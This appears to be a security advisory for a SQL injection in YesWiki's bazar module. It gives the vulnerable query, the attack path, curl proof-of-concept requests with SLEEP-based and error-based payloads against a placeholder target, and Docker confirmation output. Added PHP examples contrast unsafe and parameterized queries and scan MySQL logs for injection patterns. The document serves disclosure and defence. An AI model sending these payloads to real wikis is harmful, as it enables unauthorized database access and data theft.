YesWiki bazar module contains a SQL injection vulnerability in tools/bazar/services/EntryManager.php at line 704. The $data['id_fiche'] value (sourced from $_POST['id_fiche']) is concatenated directly into a raw SQL query without any sanitization or parameterization.
Vulnerable Code (EntryManager.php:704):
// $data['id_fiche'] comes from $_POST['id_fiche'] and is concatenated into the SQL text
$result = $this->dbService->loadSingle(
    'SELECT MIN(time) as firsttime FROM ' . $this->dbService->prefixTable('pages') .
    " WHERE tag='" . $data['id_fiche'] . "'"
);
Attack Path:
1. POST /api/entries/{formId} (route acl: {"+"}) with id_fiche=' OR SLEEP(3) OR '
2. ApiController::createEntry() checks isEntry($_POST['id_fiche']) → false (not an existing entry) → calls create()
3. create() → formatDataBeforeSave() → SQL injection at line 704
4. dbService->loadSingle() passes the raw string to mysqli_query() with no escaping. The escape() method exists but is NOT called here.
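The following is an added example, not YesWiki's code: it places the vulnerable query shape from EntryManager.php:704 next to a parameterized version and runs both against an in-memory SQLite table that stands in for the MySQL wiki_pages table. The table layout, the sample rows and the use of PDO/SQLite are assumptions made so the script runs offline; the payload uses OR 1=1 in place of the page's SLEEP(3) because SQLite has no SLEEP function, which is enough to show how the WHERE clause is rewritten.

```php
<?php
// Added example (not YesWiki's code). The in-memory SQLite table below is a
// constructed stand-in for the MySQL `wiki_pages` table named in the advisory.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE wiki_pages (tag TEXT NOT NULL, time TEXT NOT NULL)");
$pdo->exec("INSERT INTO wiki_pages VALUES
    ('TestEntry', '2024-01-01 00:00:00'),
    ('TestEntry', '2024-03-01 12:00:00'),
    ('OtherPage', '2023-06-15 08:30:00')");

// Vulnerable shape, mirroring EntryManager.php:704: the user-supplied value is
// glued into the SQL text, so a single quote in $idFiche changes the query.
function firstTimeUnsafe(PDO $pdo, string $idFiche): ?string
{
    $sql = "SELECT MIN(time) AS firsttime FROM wiki_pages WHERE tag='" . $idFiche . "'";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row['firsttime'] ?? null;
}

// Hardened shape: the value travels as a bound parameter and is never part of
// the SQL text. The table name still comes from trusted code, since
// identifiers cannot be bound.
function firstTimeSafe(PDO $pdo, string $idFiche): ?string
{
    $stmt = $pdo->prepare("SELECT MIN(time) AS firsttime FROM wiki_pages WHERE tag = :tag");
    $stmt->bindValue(':tag', $idFiche, PDO::PARAM_STR);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row['firsttime'] ?? null;
}

$benign  = 'TestEntry';
$payload = "' OR 1=1 OR '";   // constructed: same shape as the page's ' OR SLEEP(3) OR '

// With the unsafe query the payload turns the WHERE clause into a tautology and
// the result is the minimum over every row; with the safe query the payload is
// just a tag that matches no row, so MIN(time) is NULL.
printf("unsafe/benign : %s\n", firstTimeUnsafe($pdo, $benign) ?? 'NULL');
printf("unsafe/payload: %s\n", firstTimeUnsafe($pdo, $payload) ?? 'NULL');
printf("safe/benign   : %s\n", firstTimeSafe($pdo, $benign) ?? 'NULL');
printf("safe/payload  : %s\n", firstTimeSafe($pdo, $payload) ?? 'NULL');
```

With the mysqli interface the page mentions (mysqli_query), the equivalent fix is mysqli_prepare() followed by bind_param('s', $idFiche) and execute(). Calling the existing escape() method on the value before concatenation would also close this particular hole, but a prepared statement does not depend on every call site remembering to escape.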
Docker PoC confirmation:
SELECT MIN(time) as firsttime FROM wiki_pages WHERE tag='TestEntry' → 2024-01-01 00:00:00
Same query with WHERE tag='' OR SLEEP(3) OR '' → elapsed: 3.00s (SLEEP confirmed)
Prerequisites: Any authenticated user account on a YesWiki instance with a bazar form (id_typeannonce) created.
Step 1 – Obtain session cookie (standard login via web UI or API)
Step 2 – Time-based blind SQLi (confirm vulnerability):
curl -s -X POST 'http://TARGET/?api/entries/1' \
-H 'Cookie: wikini_session=<SESSION>' \
-d "antispam=1&bf_titre=TestTitle&id_fiche=' OR SLEEP(3) OR '"
→ Response delays ~3 seconds confirming SQL injection.
Step 3 – Error-based SQLi (version exfil):
curl -s -X POST 'http://TARGET/?api/entries/1' \
-H 'Cookie: wikini_session=<SESSION>' \
-d "antispam=1&bf_titre=TestTitle&id_fiche=' AND...
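On the detection side, the injected query shown in the Docker PoC leaves a recognisable trace in the MySQL general log: a statement against wiki_pages containing a time-delay function, or an empty tag literal immediately followed by a boolean operator. The script below is an added example, not YesWiki's code; the log lines are constructed for this demonstration and assume the general_log text format (timestamp, thread id, command type, statement), and the wiki_pages table name is taken from the advisory.

```php
<?php
// Added example (not YesWiki's code): flag general-log statements that carry
// the injection shape described in the advisory. Log lines are constructed.
const SAMPLE_LOG = <<<'LOG'
2024-05-01T09:12:01.000001Z    41 Query SELECT MIN(time) as firsttime FROM wiki_pages WHERE tag='TestEntry'
2024-05-01T09:12:07.000002Z    41 Query SELECT MIN(time) as firsttime FROM wiki_pages WHERE tag='' OR SLEEP(3) OR ''
2024-05-01T09:12:09.000003Z    42 Query SELECT body FROM wiki_pages WHERE tag='PagePrincipale' AND latest='Y'
2024-05-01T09:12:11.000004Z    42 Query SELECT MIN(time) as firsttime FROM wiki_pages WHERE tag='O\'Brien'
2024-05-01T09:12:13.000005Z    43 Connect root@localhost on yeswiki
LOG;

// Split one general-log line into its fields; returns null for lines that do
// not fit the assumed layout (continuation lines, headers).
function parseGeneralLogLine(string $line): ?array
{
    if (!preg_match('/^(\S+)\s+(\d+)\s+(\w+)\s+(.*)$/', $line, $m)) {
        return null;
    }
    return ['ts' => $m[1], 'thread' => (int) $m[2], 'cmd' => $m[3], 'sql' => $m[4]];
}

// Reasons a statement looks like the advisory's payload. An escaped quote in a
// legitimate tag (tag='O\'Brien') does not match either pattern.
function suspicionReasons(string $sql): array
{
    $reasons = [];
    if (preg_match('/\b(SLEEP|BENCHMARK)\s*\(/i', $sql)) {
        $reasons[] = 'time-delay function in statement';
    }
    // The injected value closes the tag literal and appends an operator,
    // leaving tag='' OR ... or tag='' AND ... in the executed SQL.
    if (preg_match("/\\btag=''\\s+(OR|AND)\\b/i", $sql)) {
        $reasons[] = 'empty tag literal followed by OR/AND';
    }
    return $reasons;
}

// Walk the log and collect Query entries with at least one reason.
function scanGeneralLog(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $entry = parseGeneralLogLine($line);
        if ($entry === null || $entry['cmd'] !== 'Query') {
            continue;
        }
        $reasons = suspicionReasons($entry['sql']);
        if ($reasons !== []) {
            $hits[] = $entry + ['reasons' => $reasons];
        }
    }
    return $hits;
}

foreach (scanGeneralLog(SAMPLE_LOG) as $hit) {
    printf("%s thread=%d: %s\n    %s\n",
        $hit['ts'], $hit['thread'], implode('; ', $hit['reasons']), $hit['sql']);
}
```

Only the second line is reported, with both reasons. The general log is expensive on a busy instance; the same two patterns can be applied to the slow query log, where a successful SLEEP(3) lands whenever long_query_time is below three seconds, or to a WAF rule on the id_fiche parameter of POST /?api/entries/{formId}.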
4.6.1
CVSS 3.1 score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)